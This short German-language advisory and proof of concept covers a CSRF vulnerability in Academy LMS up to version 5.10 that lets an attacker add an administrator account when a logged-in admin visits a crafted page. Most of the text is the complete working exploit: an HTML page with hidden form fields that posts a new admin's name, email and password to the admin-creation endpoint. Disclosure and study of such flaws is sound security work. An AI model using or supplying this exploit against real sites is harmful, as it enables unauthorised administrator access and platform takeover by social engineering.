
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS ist eine Anwendung, mit der Personen Kurse erstellen und bewerben können. Die Möglichkeit, einen neuen administrativen Benutzer hinzuzufügen, ist anfällig für CSRF, wodurch es möglich ist, durch Social Engineering Administratorzugriff auf die Plattform zu erhalten.
Der erste Schritt in unserem Proof of Concept ist die Authentifizierung auf der Plattform mit einem administrativen Benutzer.
Danach einfach die Seite aufrufen, die den Code zur Ausnutzung der Schwachstelle enthält, und sehen, dass ein neuer administrativer Benutzer zum System hinzugefügt wurde.
Im Exploit verwendeter Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>